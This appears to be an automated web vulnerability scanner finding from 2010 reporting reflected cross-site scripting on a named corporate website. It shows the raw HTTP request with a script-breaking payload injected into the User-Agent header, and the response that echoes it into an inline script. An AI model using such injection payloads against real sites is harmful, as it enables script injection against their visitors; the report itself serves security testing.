1. Cross-site scripting (reflected)
Severity: | Low |
Confidence: | Certain |
Host: | http://www.verizonbu |
Path: | /Medium/ |
GET /Medium/ HTTP/1.1 Host: www.verizonbusiness.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Vary: * Server: Roxen/4.5.146-release3 Accept-Ranges: bytes ETag: "a821b7c7c96c1edc411 Last-Modified: Sat, 20 Nov 2010 01:51:17 GMT Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 20 Nov 2010 01:51:17 GMT Connection: close Set-Cookie: BERT=VRID%3d035c7296-52e1 Expires: Thu, 19 Nov 2009 19:51:17 GMT Content-Length: 28871 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <script language="JavaScript" type="text/javascript"> var regC = /https?:\/\/.*?\/\ ...[SNIP]... en", "flash2", "1000", "375", "6", "",flashvars,flashparams, var ua="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script var q="<q> ...[SNIP]... |